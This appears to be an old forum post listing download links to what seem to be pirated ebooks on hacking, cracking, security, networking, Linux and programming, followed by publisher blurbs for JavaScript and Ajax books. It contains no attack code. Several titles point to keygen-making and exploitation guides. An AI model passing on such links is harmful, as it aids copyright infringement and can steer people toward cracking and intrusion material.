lots of e-books and tuts

BLUETOOTH
Blue Tooth Security | http://rapidshare.com/files/80571135/Bluetooth_Security.pdf

CRACKING

CRYPTOGRAPHY
An Introduction to Cryptography | http://rapidshare.com/files/80521228/An_Introduction_to_Cryptography.pdf
Cryptography's Role n Securing The Information Society | http://rapidshare.com/files/80521293/Cryptography_s_Role_n_Securing_The_Information_Society.pdf

HACKING
Defeating Encryption | http://rapidshare.com/files/80521187/Defeating_Encryption.pdf
How To Make Keygens | http://rapidshare.com/files/80521297/E-Book_-_How_To_Make_Keygens.pdf
Hacker's book Common Ways to Attack | http://rapidshare.com/files/80521308/www-hackersbook-com_chapter_common-ways-to-attack.pdf
Hacking For Dummies 1 | http://rapidshare.com/files/80521937/Hacking_For_Dummies_1.pdf
Hacking For Dummies 2 | http://rapidshare.com/files/80521984/Hacking_For_Dummies_2.pdf
Hacking into computer systems - a beginners guide | http://rapidshare.com/files/80522046/Hacking_into_computer_systems_-_a_beginners_guide.pdf
Hacking Windows XP | http://rapidshare.com/files/80522644/John.Wiley.and.Sons.Hacking.Windows.XP.Jul.2004.eBook-DDU.pdf
The Art Of Exploitation | http://rapidshare.com/files/80522872/No.Starch.Press.Hacking.The.Art.Of.Exploitation.eBook-LiB.chm
Syngress Buffer Overflow Attacks | http://rapidshare.com/files/80523456/Syngress.Buffer.Overflow.Attacks.Dec.2004.eBook-DDU.pdf
Wiley Reversing Secrets of Reverse Engineering | http://rapidshare.com/files/80523920/Wiley.Reversing.Secrets.of.Reverse.Engineering.Apr.2005.eBook-DDU.pdf
Hack - Discovery Nmap | http://rapidshare.com/files/80525146/Ebook_-_Hack_-_Discovery_Nmap.pdf
Pocket Hack Master Users Guide | http://rapidshare.com/files/80529070/Pocket_Hack_Master_Users_Guide.pdf
Learn to hack in easy steps | http://rapidshare.com/files/80537215/_ebook_computing__Learn_to_hack_in_easy_steps.pdf
Hacking - Firewalls And Networks How To Hack Into a Remote Computers | http://rapidshare.com/files/80574003/Hacking_-_Firewalls_And_Networks_How_To_Hack_Into_a_Remote_Computers.pdf

HARDWARE
Cable Modem Hack walk through | http://rapidshare.com/files/80525141/cable_modem_hack_walkthrough.pdf

NETWORKING
Cisco TCP-IP Routing Professional Reference | http://rapidshare.com/files/80527872/McGraw-Hill_Cisco_TCP-IP_Routing_Professional_Reference.pdf
Network Concepts | http://rapidshare.com/files/80527897/networkconcepts.pdf
Networking 4 | http://rapidshare.com/files/80527904/Networking4.pdf
Networking Protocol Suites | http://rapidshare.com/files/80528530/Networking_Protocol_Suites.pdf
Networking Bible | http://rapidshare.com/files/80528882/Networking.Bible.pdf
OReilly - Virtual Private Networks, Second Edition | http://rapidshare.com/files/80528971/OReilly_-_Virtual_Private_Networks__Second_Edition.pdf
Sybex, Network+ Study Guide | http://rapidshare.com/files/80529700/Sybex__Network__Study_Guide__2005___4Ed_DDU_LotB.pdf
The Encyclopedia of Networking 2 Edition | http://rapidshare.com/files/80530506/The_Encyclopedia_of_Networking_2._Edition.pdf
TS--Disable.Internet | http://rapidshare.com/files/80530511/TS--Disable.Internet.pdf
Network Security A Beginners Guide | http://rapidshare.com/files/80558286/Network.Security.A_Beginners.Guide.rar
Data Servers, Networking, and Security | http://rapidshare.com/files/80563702/C_R_S_N.pdf
Data Networks | http://rapidshare.com/files/80566896/D_N_I_P.pdf
Wireless Communications and Networking | http://rapidshare.com/files/80567752/W_C_N.pdf
Network Programming for Mcft Windows - Second Edition | http://rapidshare.com/files/80570918/Mcft-_Second_Edition_-_Caudex.chm

SECURITY
Hacker's book Identifying Attackers | http://rapidshare.com/files/80521327/www-hackersbook-com_chapter_identifying-attackers.pdf
Hack Attacks Revealed | http://rapidshare.com/files/80521836/Hack_Attacks_Revealed.pdf
Hackers Secrets | http://rapidshare.com/files/80521881/Hackers_Secrets.pdf
Maximum Security - A Hacker's Guide to Protecting Your Inter | http://rapidshare.com/files/80522774/Maximum_Security_-_A_Hacker_s_Guide_to_Protecting_Your_Inter.pdf
Hack Proofing - Your Network - Internet Tradecraft | http://rapidshare.com/files/80525311/Hack_Proofing_-_Your_Network_-_Internet_Tradecraft.pdf
Hack Proofing Your Wireless Network | http://rapidshare.com/files/80525674/Hack_Proofing_Your_Wireless_Network.pdf
Hacking Exposed Network Security Secrets & Solutions, Third | http://rapidshare.com/files/80525820/Hacking_Exposed_Network_Security_Secrets___Solutions__Third_.pdf
Hacking Exposed- Web Applications | http://rapidshare.com/files/80530894/Hacking_Exposed-_Web_Applications__MCGraw-Hill-2002_.pdf
Cross Site Scripting Detection and Prevention | http://rapidshare.com/files/80534573/Cross_site_scripting_detection_and_prevention.pdf
Hack IT Security Through Penetration Testing | http://rapidshare.com/files/80535490/Hack_IT_Security_Through_Penetration_Testing.pdf
Hacker Secret Book | http://rapidshare.com/files/80535523/Hacker_Secret_Book.pdf
Hackerland | http://rapidshare.com/files/80535553/Hackerland.pdf
Hacker's Encyclopedia | http://rapidshare.com/files/80535564/Hacker_s_Encyclopedia.txt
Hacking Exposed | http://rapidshare.com/files/80536064/Hacking_Exposed.pdf
HACKKIT | http://rapidshare.com/files/80536092/HACKKIT.TXT
Hugo Cornwall - The Hacker's Handbook | http://rapidshare.com/files/80536117/Hugo_Cornwall_-_The_Hacker_s_Handbook_.pdf
ICMP Scanning v2.0 | http://rapidshare.com/files/80536148/ICMP_Scanning_v2.0.pdf
IIS_Security_and_Programming_Countermeasures | http://rapidshare.com/files/80536371/IIS_Security_and_Programming_Countermeasures.pdf
Improve by Breaking | http://rapidshare.com/files/80536377/improve_by_breakin.txt
Maximum Security | http://rapidshare.com/files/80536559/Maximum_Security.pdf
Network - The Hacker Crackdown | http://rapidshare.com/files/80536598/Network_-_The_Hacker_Crackdown.pdf
PC TIPS & TRICKS - Hacker Bible | http://rapidshare.com/files/80536612/PC_TIPS___TRICKS_-_Hacker_Bibel_2000_.pdf
Practical Stealth Portscan Discovery | http://rapidshare.com/files/80536625/Practical_Stealth_Portscan_Discovery_-_spice-ccs2000.pdf
Practical-SEH-exploitation | http://rapidshare.com/files/80536685/Practical-SEH-exploitation.pdf
Hall PTR Internet Denial of Service Attack and Defense Mechanisms | http://rapidshare.com/files/80536799/Prentice_1_.Hall.PTR.Internet.Denial.of.Service.Attack.and.Defense.Mechanisms.eBook-DDU.zip
Router Security Guidance Activity | http://rapidshare.com/files/80536939/Router_Security_Guidance_Activity.pdf
XML_Secuirty | http://rapidshare.com/files/80537208/XML_Secuirty.pdf
100 Ways To Disappear | http://rapidshare.com/files/80537236/100_Ways_To_Disappear.doc
Hack IT Security Through Penetration Testing | http://rapidshare.com/files/80537514/Addison.Wesley-Hack.I.T.Security.Through.Penetration.Testing-2002.chm
Computer Vulnerabilities | http://rapidshare.com/files/80537550/Computer_Vulnerabilities.pdf
Configuring Windows 2000 Server Security | http://rapidshare.com/files/80537787/Configuring_Windows_2000_Server_Security.pdf
Hacker Web Exploitation Uncovered | http://rapidshare.com/files/80552331/Hacker.Web.Exploitation.Uncovered-fusion89_waushare.rar
A Plus Network Plus Security Plus Exams in A Nutshell | http://rapidshare.com/files/80557304/A_Plus_Network_Plus_Security_Plus_Exams_in_A_Nutshell.pdf
Handbook of Database Security | http://rapidshare.com/files/80561473/Handbook.of.Database.Security.0387485325.rar
The International Handbook of Computer Security | http://rapidshare.com/files/80562155/The.International.Handbook.of.Computer.Security.eBook-EEn.pdf
Auerbach Information Security Management Handbook 6th Edition | http://rapidshare.com/files/80566300/Auerbach.Information.Security.Management.Handbook.6th.Edition-BBL.rar
Router Security | http://rapidshare.com/files/80571279/Router_Security_Guidance_Activity.pdf
Firewall Book | http://rapidshare.com/files/80572125/Juniper_Firewall_Book.pdf
Building Internet Firewalls | http://rapidshare.com/files/80572698/Building_Internet_Firewalls_2nd_Edition_eBooK.pdf

LINUX
Understanding the LINUX Kernel | http://rapidshare.com/files/80520345/O_Reilly_-_Understanding_The_Linux_Kernel.pdf
O'Reilly Linux In A Nutshell, 4th Edition | http://rapidshare.com/files/80524025/O_Reilly_--_Linux_In_A_Nutshell__4th_Edition.chm
Sams Linux Shell Scripting with Bash | http://rapidshare.com/files/80524406/Sams.Linux.Shell.Scripting.with.Bash.eBook-LinG.pdf
Hacking Red Hat Kickstart | http://rapidshare.com/files/80524412/Hacking_Red_Hat_Kickstart.pdf
Linux From Scratch | http://rapidshare.com/files/80524467/Linux_From_Scratch.pdf
How Linux Works What Every Super User Should Know | http://rapidshare.com/files/80525139/No.Starch.Press.How.Linux.Works.What.Every.Super.User.Should.Know.eBook-LiB.chm
Linux Networking Bible | http://rapidshare.com/files/80526912/Linux_Networking_Bible.pdf
Red Hat Linux | http://rapidshare.com/files/80531297/R_H_L.pdf
Linux Complete Command Reference | http://rapidshare.com/files/80531851/Linux_Complete_Command_Reference-0672311046.pdf
Linux Network Servers | http://rapidshare.com/files/80532189/Linux.Network.Servers.pdf
Hardening Linux | http://rapidshare.com/files/80532688/Hardening_Linux.chm
The Linux Networking Architecture Design and Implementation of Network
inux_Shell_Scripting_Tutorial | http://rapidshare.com/files/80549460/Linux_Shell_Scripting_Tutorial.posted_at_eselfilme.de.pdf
Fedora Linux | http://rapidshare.com/files/80553910/Fedora.Linux.Oct.2006.rar
Linux For Dummies 7th Edition | http://rapidshare.com/files/80563973/Linux.For.Dummies.7th.Edition.May.2006.rar

UNIX
UNIX Hints & Hacks | http://rapidshare.com/files/80550133/UNIX_Hints___Hacks.pdf
Unix Commands | http://rapidshare.com/files/80550137/Unix_Commands.pdf
Unixguide | http://rapidshare.com/files/80550141/unixguide.pdf
Unix-power-tools | http://rapidshare.com/files/80550891/unix-power-tools.pdf

PROGRAMING
GENERAL
Writing security tools and exploits | http://rapidshare.com/files/80562045/writing-security-tools-and-exploits.9781597499972.23482.pdf
Coding Secure Code | http://rapidshare.com/files/80562700/Code_Sec.pdf

ASM
Assembler Intel Code Table | http://rapidshare.com/files/80541077/Assembler_Intel_Code_Table.pdf

ASP

C/C++
ANSI-ISO C++ Professional Programmer's Handbook | http://rapidshare.com/files/80541154/ANSI-ISO_C___Professional_Programmer_s_Handbook.pdf
C in 21 Days | http://rapidshare.com/files/80541336/C_in_21_Days.pdf
C Programming | http://rapidshare.com/files/80541454/C_Programming.PDF
C++ Programming HOW-TO v40 | http://rapidshare.com/files/80541477/C___Programming_HOW-TO_v40.3.pdf
C++ | http://rapidshare.com/files/80541709/C__.pdf
CPP | http://rapidshare.com/files/80541753/cpp_einfuehrung.pdf
Object-Oriented System Development | http://rapidshare.com/files/80541952/Object-Oriented_System_Development.pdf
Thinking in C++ Volume1 | http://rapidshare.com/files/80542096/Thinking_in_C___Volume1.pdf
Visual C++ for Dummies Quick Reference | http://rapidshare.com/files/80542657/Visual_C___for_Dummies_Quick_Reference.pdf
C++ Standard Library | http://rapidshare.com/files/80564172/tc__sl.rar

C#
Pro C# 2008 and the NET 3.5 Platform Fourth Edition | http://rapidshare.com/files/80573838/Pro_C__2008_and_the_NET_3.5_Platform_Fourth_Edition.pdf

COBRA
CORBA Firewall Security | http://rapidshare.com/files/80542859/CORBA_Firewall_Security.pdf
CORBA on the Internet | http://rapidshare.com/files/80542962/CORBA_on_the_Internet_-_0iona.pdf
CORBA Proxy | http://rapidshare.com/files/80542980/CORBA_Proxy.pdf
DOCsec3 | http://rapidshare.com/files/80542987/DOCsec3.ppt
Domain Boundary Controller | http://rapidshare.com/files/80543001/Domain_Boundary_Controller_-_Xtradyne.pdf
Firewalls - OSE Remote | http://rapidshare.com/files/80543043/Firewalls_-_OSE_Remote.pdf
Java RMI, CORBA und Firewalls | http://rapidshare.com/files/80543047/Java_RMI__CORBA_und_Firewalls.pdf
NAI-Labs-Intrusion Tolerant CORBA | http://rapidshare.com/files/80543056/NAI-Labs-Intrusion_Tolerant_CORBA.pdf
OrbixWeb | http://rapidshare.com/files/80543082/OrbixWeb1.ppt
RMI CORBA und Firewalls | http://rapidshare.com/files/80543092/RMI_CORBA_und_Firewalls.pdf
Seitz - Generic Proxy Platform for CORBA Applications | http://rapidshare.com/files/80543097/Seitz_-_Generic_Proxy_Platform_for_CORBA_Applications.pdf
Status of the CORBA Firewall | http://rapidshare.com/files/80543105/Status_of_the_CORBA_Firewall.pdf
Teach Yourself CORBA In 14 Days | http://rapidshare.com/files/80543199/Teach_Yourself_CORBA_In_14_Days.pdf

CGI
CGI Developer's Guide | http://rapidshare.com/files/80545793/CGI_Developer_s_Guide.pdf
CGI for Commerce | http://rapidshare.com/files/80545890/CGI_for_Commerce.pdf

Java
Creating Web Applets with Java | http://rapidshare.com/files/80543256/Creating_Web_Applets_with_Java.pdf
Java CGI How To | http://rapidshare.com/files/80543266/Java_CGI_How_To.pdf
Javadoc | http://rapidshare.com/files/80543288/javadoc.pdf
Learning Java with JBuilder | http://rapidshare.com/files/80543535/Learning_Java_with_JBuilder.pdf
Teach Yourself Java In 21 Days | http://rapidshare.com/files/80543868/Teach_Yourself_Java_In_21_Days.pdf
Thinking in Java | http://rapidshare.com/files/80544055/Thinking_in_Java.pdf
Data Structures | http://rapidshare.com/files/80571064/Dat_Struc.pdf

Javascript

Perl
Advanced Perl Programming | http://rapidshare.com/files/80545690/Advanced_Perl_Programming.pdf
Learning Perl on Win32 Systems | http://rapidshare.com/files/80546153/Learning_Perl_on_Win32_Systems.pdf
Learning Perl | http://rapidshare.com/files/80546405/Learning_Perl.pdf
network-programming-with-perl-(slides) | http://rapidshare.com/files/80546447/network-programming-with-perl-_slides__.pdf
Perl 5 by exemple | http://rapidshare.com/files/80546631/Perl_5_by_exemple_-_ebook.pdf
Perl Cookbook | http://rapidshare.com/files/80547165/Perl_Cookbook.pdf
Perl in a nutshell | http://rapidshare.com/files/80548599/perl_in_a_nutshell.pdf
Programming Perl | http://rapidshare.com/files/80549230/Programming_Perl.pdf
Teach Yourself Perl in 21 Days | http://rapidshare.com/files/80549451/Teach_Yourself_Perl_in_21_Days.pdf

Delphi

Shell
Shell Programming in 24 hours | http://rapidshare.com/files/80549646/shell_programming_in_24_hours.pdf
Windows Shell Script Programming For The Absolute Beginner | http://rapidshare.com/files/80562384/Windows_Shell_Script_Programming_For_The_Absolute_Beginner_-_Premier_Press.chm

PHP
Learn PHP in 24 Hours | http://rapidshare.com/files/80520584/SAMS_Teach_Yourself_PHP4_in_24_Hours.pdf
Premier Press - PHP.MySQL Programming for the Absolute Beginner | http://rapidshare.com/files/80533486/Premier_Press_-_PHP.MySQL_Programming_for_the_Absolute_Beginner.chm

SQL/MySQL
New Riders - MySQL and Perl for the Web | http://rapidshare.com/files/80549713/New_Riders_-_MySQL_and_Perl_for_the_Web.chm
McGraw Hill Mcft SQL Server 2005 The Complete Reference | http://rapidshare.com/files/80553526/McGraw.Hill.Mcft.SQL.Server.2005.The.Complete.Reference.rar

Oracle
Oracle 9i - Application Developer's Guide - Fundamentals | http://rapidshare.com/files/80544288/Oracle_9i_-_Application_Developer_s_Guide_-_Fundamentals.pdf
Oracle 9i - Application Developer's Guide - Object Relational Features | http://rapidshare.com/files/80544388/Oracle_9i_-_Application_Developer_s_Guide_-_Object_Relational_Features.pdf
Oracle 9i - designer overview | http://rapidshare.com/files/80544430/Oracle_9i_-_designer_overview.pdf
Oracle 9i - form server best practices | http://rapidshare.com/files/80544445/Oracle_9i_-_form_server_best_practices_.pdf
Oracle 9i - Forms technical overview | http://rapidshare.com/files/80545024/Oracle_9i_-_Forms_technical_overview.pdf
Teach Yourself Oracle 8 In 21 Days | http://rapidshare.com/files/80545132/Teach_Yourself_Oracle_8_In_21_Days.pdf
Using Oracle8 | http://rapidshare.com/files/80545343/Using_Oracle8.pdf

Pascal
Pascal Programming | http://rapidshare.com/files/80545419/Pascal_Programming.pdf

==============================================================================================================

Download the following 15 Books in this post: (92.5 MB)

http://rapidshare.com/files/78417045/Javascript_AJAX_1.rar


[Apress] Beginning JavaScript with DOM Scripting and Ajax From Novice to Professional (2006).pdf
[Apress] Pro JavaScript Techniques (2006).pdf
[Manning] Ajax in Action (2005).pdf
[No Starch] The Book of JavaScript (2006).pdf
[O'Reilly] Head Rush Ajax (2006).chm
[O'Reilly] JavaScript, The Definitive Guide (2006).chm
[O'Reilly] Learning JavaScript (2006).chm
[Peachpit] JavaScript and Ajax for the Web (2006).chm
[Prentice Hall] PTR Understanding AJAX Using JavaScript to Create Rich Internet Applications (2006).chm
[SitePoint] Modern Web Design Using JavaScript and DOM (2005).pdf
[SitePoint] Simply JavaScript (2007).pdf
[SitePoint] The JavaScript Anthology, 101 Essential Tips, Tricks & Hacks (2006).pdf
[Wiley & Sons] Ajax Bible (2007).chm
[Wrox] Beginning JavaScript (2007).pdf
[Wrox] Professional JavaScript For Web Developers (2005).pdf



[SitePoint] Simply JavaScript (2007)
11.3 MB

Image

Book Description
Everything you need to learn JavaScript from Scratch!

Packed with full-color examples, Simply JavaScript is a step-by-step introduction to programming in JavaScript the right way. Learn how easy it is to use JavaScript to solve real-world problems, build smarter forms, track user events (such as mouse clicks and key strokes), and design eye-catching animations. Then move into more powerful techniques using the DOM and Ajax.


* Learn JavaScript's built-in functions, methods, and properties.
* Easily integrate JavaScript in your web site.
* Use JavaScript to validate form entries and interact with your users.
* Understand how to respond to user events.
* Create animations that bring your web site to life.
* Start programming using the DOM and Ajax.

Unlike other JavaScript books, modern best practices such as progressive enhancement, accessibility and unobtrusive scripting are used from the very beginning. All the code in the book is also cross-browser compatible and downloadable for free, so you can get started instantly!

Download:

http://mihd.net/hjy2u9


[Wrox] Beginning JavaScript (2007)
12.7 MB

Image

Book Description
Suitable for learning basic programming for Web browsers, Beginning JavaScript is a patient, introductory tutorial on writing scripts successfully. It teaches you how to create client-side scripts (including full coverage of fundamentals like variables and flow control, plus plenty of screen shots.)

JavaScript is a good way to learn programming. It's powerful, of course, but the book takes small steps, using scripts that work with string and time data first, and then moving to manipulating browser objects like forms and windows. A running case study for a trivia game helps anchor the steps with a practical (and fun) example. There are plenty of tips on debugging your scripts (including how to use the M!crosoft Script Debugger tool), and each section includes sample questions. (The book also offers extensive answers in over 80 pages at the end of the book.)

There's plenty of material on the differences between Internet Explorer and Netscape, especially when it comes to Dynamic HTML (DHTML). Coverage of the Document Object Model (DOM) for browsers helps bring the text up to date on some of the latest standards in Web browsers (including the new Netscape 6).

While the focus of Beginning JavaScript clearly is on the client, later sections turn to server-side ASP development (in which the sample trivia game is enhanced with ASPs written in JavaScript using ADO and M!crosoft Access.) Reference sections on JavaScript and the browser object model for Internet Explorer and Netscape (through version 4.x) round out the material.

In all, with its approachable style and clearly rendered code examples, Beginning JavaScript makes for a worthwhile first book of programming for today's browsers. Even if you haven't programmed before, this text can give you the tools you need to bring your static Web pages to life.

Download:

http://mihd.net/wbf7ks


[O'Reilly] Learning JavaScript (2006)
1.57 MB

Image

Book Description
As web browsers have become more capable and standards compliant, JavaScript has grown in prominence. JavaScript lets designers add sparkle and life to web pages, while more complex JavaScript has led to the rise of Ajax -- the latest rage in web development that allows developers to create powerful and more responsive applications in the browser window.

Learning JavaScript introduces this powerful scripting language to web designers and developers in easy-to-understand terms. Using the latest examples from modern browser development practices, this book teaches you how to integrate the language with the browser environment, and how to practice proper coding techniques for standards-compliant web sites. By the end of the book, you'll be able to use all of the JavaScript language and many of the object models provided by web browsers, and you'll even be able to create a basic Ajax application.

Download:

http://mihd.net/39zlgn


[O'Reilly] JavaScript, The Definitive Guide (2006)
2.22 MB

Image

Book Description
This Fifth Edition is completely revised and expanded to cover JavaScript as it is used in today's Web 2.0 applications. This book is both an example-driven programmer's guide and a keep-on-your-desk reference, with new chapters that explain everything you need to know to get the most out of JavaScript, including:


* Scripted HTTP and Ajax
* XML processing
* Client-side graphics using the tag
* Namespaces in JavaScript--essential when writing complex programs
* Classes, closures, persistence, Flash, and JavaScript embedded in Java applications

Part I explains the core JavaScript language in detail. If you are new to JavaScript, it will teach you the language. If you are already a JavaScript programmer, Part I will sharpen your skills and deepen your understanding of the language.

Part II explains the scripting environment provided by web browsers, with a focus on DOM scripting with unobtrusive JavaScript. The broad and deep coverage of client-side JavaScript is illustrated with many sophisticated examples that demonstrate how to:


* Generate a table of contents for an HTML document
* Display DHTML animations
* Automate form validation
* Draw dynamic pie charts
* Make HTML elements draggable
* Define keyboard shortcuts for web applications
* Create Ajax-enabled tool tips
* Use XPath and XSLT on XML documents loaded with Ajax
* And much more

Part III is a complete reference for core JavaScript. It documents every class, object, constructor, method, function, property, and constant defined by JavaScript 1.5 and ECMAScript version 3.

Part IV is a reference for client-side JavaScript, covering legacy web browser APIs, the standard Level 2 DOM API, and emerging standards such as the XMLHttpRequest object and the tag.

Download:

http://mihd.net/mydx4j


[SitePoint] Modern Web Design Using JavaScript and DOM (2005)
2.64 MB



Book Description
This book will show you how to:


* Gain an in-depth knowledge of the Document Object Model (DOM)
* Make reusable modular image rollovers that keep your code separate from the content of the page
* Discover how to use DOM Events to make your code respond to input from the user
* Make tables more readable with dynamic highlighting
* Learn how to use feature sniffing to determine the browser’s capabilities so that your scripts won’t trouble browsers that are incapable of handling them
* Discover how animation can be used to improve usability
* Create animated tooltips to guide visitors through your site
* Discover how to validate form data using regular expressions, and give dynamic feedback to your users
* Build self-suggesting dropdown lists that improve the usability of dropdown menus, just like Google Suggest
* Discover the benefits of object-based programming
* Develop a fully standards-compliant, cross-browser, customizable navigation menu
* Get the lowdown on Remote Scripting techniques and AJAX
* Create form fields with name resolution that will automatically resolve an email address from a nickname
* Construct an AJAX signup form that can automatically let a user know that a username is taken without having to submit the whole form
* Learn how to make your JavaScript communicate with the server
* Develop a drag and drop file manager application (link to online version)
* Use XML-RPC and the Blogger API to make a weblog post editor
* Use XPath and JavaScript to parse RSS feeds
* And a whole lot more..

Download:

http://mihd.net/vd9t2j


[SitePoint] The JavaScript Anthology, 101 Essential Tips, Tricks & Hacks (2006)
2.98 MB

Image

Book Description
Among the 101 Tips, Tricks & Hacks you’ll learn how-to:


* Create a slick yet accessible drop-down menu system
* Take control of your web pages with the DOM
* Validate forms in real time using regular expressions
* Optimize your code so that it runs faster
* Manage style sheets and modify styles on-the-fly
* Produce sophisticated drag-and-drop interaction
* Enhance your site with slick, animated transitions
* Create AJAX applications with the XMLHttpRequest object

Download:

http://mihd.net/kpd1rx


[Apress] Pro JavaScript Techniques (2006)
5.82 MB

Image

Book Description
ro JavaScript Techniques is the ultimate JavaScript book for the modern web developer. It provides everything you need to know about modern JavaScript, and shows what JavaScript can do for your web sites. This book doesn't waste any time looking at things you already know, like basic syntax and structures.

Expert web developer and author John Resig concentrates on fundamental, vital topics--what modern JavaScripting is (and isn't), the current state of browser support, and pitfalls to be wary of. The book is organized into four sections:


* Modern JavaScript development--using JavaScript the object-oriented way, creating reusable code, plus testing and debugging
* DOM scripting--updating content and styles, plus events, and effect and event libraries
* Ajax--how Ajax works, overcoming problems, and using libraries to speed up development of Ajax applications
* The future of JavaScript--looking at cutting edge topics like JSON, HTML 5, and more

All concepts are backed up by real-world examples and case studies, and John provides numerous reusable functions and classes to save you time in your development. There are also up-to-date reference appendixes for the DOM, events, browser support (including IE7), and frameworks--so you can look up specific details quickly and easily.


http://mihd.net/two0jd


[No Starch] The Book of JavaScript (2006)
5.91 MB

Image

Book Description
With JavaScript, you can add interactivity, animation, and other tricks to your web pages quickly. But this isn't just a book of scripts for you to cut and paste into your HTML, only to find out later that nothing works as you'd expected. Using real-world examples as the starting point, author thau! walks you step by step through various scripts and explains how they produce the effects you want.

Because no discussion of JavaScript today is complete without coverage of Ajax, this thoroughly updated second edition includes new chapters on Ajax, so you can get up to speed with this valuable method for creating truly dynamic web pages. This second edition of the best-selling The Book of JavaScript also features revised appendices and new examples throughout to reflect today's web environment. Inside, you'll learn to:


* Work with frames, forms, cookies, and alarms
* Use events to react to a user's actions
* Perform image swaps and rollovers
* Program your own functions to produce customized solutions
* Store user preferences and build a shopping cart
* Use Dynamic HTML to turn web pages into multimedia applications

If you need to spruce up tired-looking pages, The Book of JavaScript, 2nd Edition will help take your site from bland to brilliant.

Download:

http://mihd.net/0ikc9g


[Prentice Hall] PTR Understanding AJAX Using JavaScript to Create Rich Internet Applications (2006)
6.23 MB



Book Description
Already an experienced Web developer? Apply your skills in today’s fastest-growing area of Web development: AJAX!

Building on what you already know, this fast-paced guide will show you exactly how to create rich, usable Internet applications. Joshua Eichorn teaches through sophisticated code examples, including extensive server-side PHP code.

You won’t just learn how to code AJAX applications: Eichorn covers the entire development lifecycle, from use cases and design through debugging. He also presents detailed application case studies, including a start-to-finish update of a non-AJAX application that addresses everything from feature improvements to changing usage patterns. Coverage includes:


* How AJAX changes the conventional Web development cycle
* Problems created by the AJAX paradigm -- and how to avoid them
* Adding AJAX to existing Web applications: key considerations
* Using core AJAX technologies, including the XMLHttpRequest object
* Consuming data returned to an AJAX application using both XSLT and JSON
* Building more usable AJAX applications: guidelines and downloadable resources
* Use cases: solving real-world problems in the AJAX environment
* Libraries and toolkits for simplifying AJAX development, including Sarissa, scriptaculous, and HTML_AJAX
* A complete guide to AJAX debugging
* Supporting browsers without XMLHttpRequest by using IFrames or cookies
* JSON data encoding debugging guide, which covers tools for Firefox and Internet Explorer
* A list of libraries, which includes PHP, .NET, Java, and other libraries that can be used with any server language

Download:

http://mihd.net/jc2qz9


[Wrox] Professional JavaScript For Web Developers (2005)
8.99 MB



Book Description


* Dispels the myth that JavaScript is a "baby" language and demonstrates why it is the scripting language of choice used in the design of millions of Web pages and server-side applications
* Quickly covers JavaScript basics and then moves on to more advanced topics such as object-oriented programming, XML, Web services, and remote scripting
* Addresses the many issues that Web application developers face, including internationalization, security, privacy, optimization, intellectual property issues, and obfuscation
* Builds on the reader's basic understanding of HTML, CSS, and the Web in general

Download:

http://mihd.net/lort9g


[Manning] Ajax in Action (2005)
9.25 MB



Book Description
Web users are getting tired of the traditional web experience. They get frustrated losing their scroll position; they get annoyed waiting for refresh; they struggle to reorient themselves on every new page. And the list goes on. With asynchronous JavaScript and XML, known as "Ajax," you can give them a better experience. Once users have experienced an Ajax interface, they hate to go back. Ajax is new way of thinking that can result in a flowing and intuitive interaction with the user.

Ajax in Action helps you implement that thinking--it explains how to distribute the application between the client and the server (hint: use a "nested MVC" design) while retaining the integrity of the system. You will learn how to ensure your app is flexible and maintainable, and how good, structured design can help avoid problems like browser incompatibilities. Along the way it helps you unlearn many old coding habits. Above all, it opens your mind to the many advantages gained by placing much of the processing in the browser. If you are a web developer who has prior experience with web technologies, this book is for you.

Download:

http://mihd.net/ci8qn2


[Peachpit] JavaScript and Ajax for the Web (2006)
12.8 MB

RECOMMEND PUBLISHER


Book Description
Need to learn JavaScript fast? This best-selling reference’s visual format and step-by-step, task-based instructions will have you up and running with JavaScript in no time. In this completely updated edition of our best-selling guide to JavaScript, leading Web and computing experts Tom Negrino and Dori Smith use crystal-clear instructions and friendly prose to introduce you to all of today's JavaScript essentials. Along the way, you'll find extensive coverage of Ajax and XML techniques, current browsers (Opera, Safari, Firefox), and more.

Visual QuickStart Guide--the quick and easy way to learn!


* Easy visual approach uses pictures to guide you through JavaScript and show you what to do.
* Concise steps and explanations get you up and running in no time.
* Page for page, the best content and value around.
* Companion Web site at
Code:
http://www.javascriptworld.com
offers sample scripts, updates, and more!

Download:

http://mihd.net/ftsxr3


[Apress] Beginning JavaScript with DOM Scripting and Ajax From Novice to Professional (2006)
14.0 MB


Book Description
JavaScript is one of the most important technologies on the web. It provides the means to add dynamic functionality to your web pages and serves as the backbone of Ajax-style web development. Beginning JavaScript with DOM Scripting and Ajax is an essential guide for modern JavaScript programming; it's practical but comprehensive. It covers everything you need to know to get up to speed with JavaScript development to add dynamic enhancements to web pages and program Ajax-style applications.

Experienced web developer Christian Heilmann begins gently by giving you an overview of JavaScript--its syntax, good coding practices, and the principles of DOM scripting. Then he builds up your JavaScript toolkit, covering dynamically manipulating markup, changing page styling on the fly using the CSS DOM, validating forms, dealing with images, and much more. Then he takes you to advanced territory, with a complete case study illustrating how many new JavaScript techniques can work together, plus a great introduction to Ajax development.

Download:

http://mihd.net/09tu7i



Book Description
If you think that mastering Ajax is too difficult, guess again. You can create Web applications that look and feel like desktop apps in less time than you think with the comprehensive Ajax instruction in this in-depth book. You'll find easy-to-follow tutorials, hundreds of tips and tricks, and so much practical information that even skilled developers will reach for this book first. Let this Bible be your guide as you jump into the hottest Web programming technology in years.


* Master the fundamentals--JavaScript(r), XML, dynamic HTML, and CSS
* Tie Ajax into Google with the Google(r) API
* Handle simultaneous XMLHttpRequest objects in Ajax
* Use Ajax frameworks such as Ruby on Rails, AjaxTags, and others
* Understand the Document Object Model (DOM)
* Create floating menus and effects with CSS
* Encrypt data over plain HTTP using JavaScript

Download:

http://mihd.net/4lsvri

Book Description
Asynchronous programming lets you turn your own web sites into smooth, slick, responsive applications that make your users feel like they're back on the information superhighway, not stuck on a dial-up backroad. With Head Rush Ajax, in no time you'll be writing JavaScript code that fires off asynchronous requests to web servers...and having fun doing it. Head Rush Ajax takes you beyond basic web development with DHTML and JavaScript and explains how asynchronous data requests and more powerful event models can be used in the Ajax methodology.

Sick of creating web sites that reload every time a user moves the mouse? Tired of servers that wait around to respond to users' requests for movie tickets? It sounds like you need a little (or maybe a lot of) Ajax in your life. Asynchronous programming lets you turn your own web sites into smooth, slick, responsive applications that make your users feel like they're back on the information superhighway, not stuck on a dial-up backroad.

